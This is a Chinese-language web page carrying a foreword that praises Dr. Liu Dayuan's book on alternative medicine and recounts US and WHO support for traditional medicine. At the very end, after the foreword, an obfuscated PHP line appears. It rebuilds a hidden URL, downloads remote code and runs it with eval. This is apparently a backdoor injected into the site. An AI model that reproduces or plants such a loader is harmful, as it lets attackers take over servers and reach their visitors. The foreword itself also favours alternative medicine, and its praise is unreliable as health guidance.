收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

中西醫學整合先驅

張永賢 中國醫藥大學教授暨副校長

劉大元醫師有著自己及家人的疾病治療經歷,有著學習 的艱辛過程,廣納百川,確實是中西醫學整合的先驅。

很高興看到學醫的朋友,就讀醫學大學,取得醫師 執照及專科醫師;醫療服務多年,在針灸國際熱潮時學習 針灸醫學,然後又進修中醫學分,試圖走向「中西醫一元 化」的境界。

美國雖然是世界上醫藥最發達的國家,可是在1992 年哈佛大學埃森伯教授(Dr. David Eisenberg)所做的全國 調查中,發現美國人有36%的成年人使用傳統醫學,以致 美國衛生研究院(NIH)在參議院要求成立「另類醫學辦 公室」(Office of Alternative Medicine)(OAM)。當時 只撥款一年200萬美金做為研究經費,他們認為「另類醫 學」是醫學大學未教授的課程,經過幾年研究可證明傳統 醫學無效,即可以此證據來做把關。但是到了1998年又做了一次全國調查,發現成年人使用傳統醫學的人數自36%增加至42%,以致美國國家衛生研究院自原有「另類醫學辦公室」,擴大為「國家互補與另類醫學中心」(National Center of Complementary and Alternative Medicine)(NCCAM),雖仍是「另類醫學」,但已進展到「互補 醫學」;顯示醫學界學習謙虛,接受廣大民眾使用的「傳 統醫學」進入「互補醫學」。2005年,研究經費成長至一 年1億2千3百萬美元,著名大學或附設醫院:哈佛大學、 史丹佛大學、加州大學、馬利蘭大學、德州大學等紛紛成 立NCCAM中心。美國接續發行《另類及互補醫學雜誌》
(The Journal of Alternative and Complementary Medicine)及《美洲中醫雜誌》(American Journal of Chinese Medicine) 等SCI醫學期刊。

世界衛生組織(WHO)在1979年發表觀點,建議可 用針灸來治療43種疾病。1989年公告《國際標準針灸穴名 方案》(Standard Acupuncture Nomenclature),將針灸醫 學推廣至國際應用,促進國際針灸學術共同語言拓展交流 大道。1995年發表《針灸臨床研究規範》(Guidelines for Clinical Research on Acupuncture),1999年發表《針灸基 本訓練及安全規範》(Guidelines on basic training and safety in Acupuncture ),2000年發表《傳統醫學研究和評估的方法論一般規範》(General Guidelines for Methodologies on Research and Evaluation of Traditional Medicine),2002年5月16日第55屆世界衛生大會發表《2002-2005世界衛生組 織傳統醫學全球策略》 (WHO Traditional Medicine Strategy2002-2005)。2007年發表《WHO傳統醫學國際標準術語》(WHO International Standard Terminologies on Traditional Medicine in the Western Pacific Region),共計有3,543個傳 統醫學術語的定義及解釋。世界衛生組織今年亦將公布《WHO國際針灸穴位定位標準》(WHO Standardization of Acupuncture Points Location)。

劉大元醫師為國立陽明大學醫學院醫學系第二屆畢業,在台北榮總醫院學習針灸醫學,在中國醫藥大學學習 中醫學分,多年從事中西醫結合。自述家族多病,甚至自 己自小病痛,以致抱著學醫信念進入醫學殿堂。由於是公 費生,畢業後服務鄉村衛生所工作達六年之久,每月求診 病患七千人次──即為一天有兩百位以上看診人數的名醫。 當公職服務期滿,突然感到自己平日辛苦診療服務只是做「症狀治療」,以致在自己及家人生病時,開始探尋各種 醫療方式。首先嘗試學習傳統醫學,開始時抱著半疑半信 的態度,然後愈學習愈深入,也踏入佳境,領悟學海無 涯;而後成為「另類醫學」醫師,進而組織「另類醫學醫學會」,甚至寫出大作要與大家分享。看到劉大元醫師的身歷旅程,以及對於各種傳統醫學的詳盡介紹,讓人由衷感佩。

醫學從20世紀的「疾病醫學」走入21世紀的「病人 醫學」,即是「以病人為中心的醫學」。邁入21世紀揭開 人類基因體的密碼,「個人化醫學」的時代來臨。「西 醫」其實不是所有西方醫學的簡稱,主要是指近代的西方 醫學,融入近代現代科學範疇的醫學。近數百年所指「西 醫」走出「自然哲學醫」的懷抱,走向解剖、實驗和分析 為主導方法的近代科學的行列,以解剖學、生理學、病理 學等為基礎,以生物醫學模式為特徵,能夠及時吸收其他 科學技術的成果來豐富、充實自己,並隨著科學技術的發展而成長。特別是到了20世紀以後,西醫所提的現代科學 技術革命的成就,得到突飛猛進的發展,一躍成為「現代 醫學」的主體。所謂「現代醫學」即成為主要指「現代西 醫」,而其他醫學則成為「傳統醫學」、「另類醫學」或「互補醫學」,或是「另類互補醫學」。醫學原以蛇杖為 代表,也源於自然醫學。傳統醫學的現代化,仍然需要更多醫者來發揚光大。

劉大元醫師今出版大作 《 你 不 可 不 知 的 另 類 健 康 法》,有著自己及家人的疾病治療經歷,有著學習的艱辛過程,廣納百川,做為中西醫學整合的先驅,也成就了以病人為主的醫學。樂見大作早日出版,以「人人享有醫療 保健」(Health for All)為目標,寄望人人都能擁有健康的身體。



張永賢 簡介

‧行政院衛生署中醫藥委員會委員
‧行政院衛生署中藥床試驗小組委員
‧中醫師全國聯合會國際交流委員會主任委員
‧中西整合醫學會學術教育委員會主任委員
‧國際華夏醫藥學會副會長
‧中華針灸醫學會創會理事長



 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));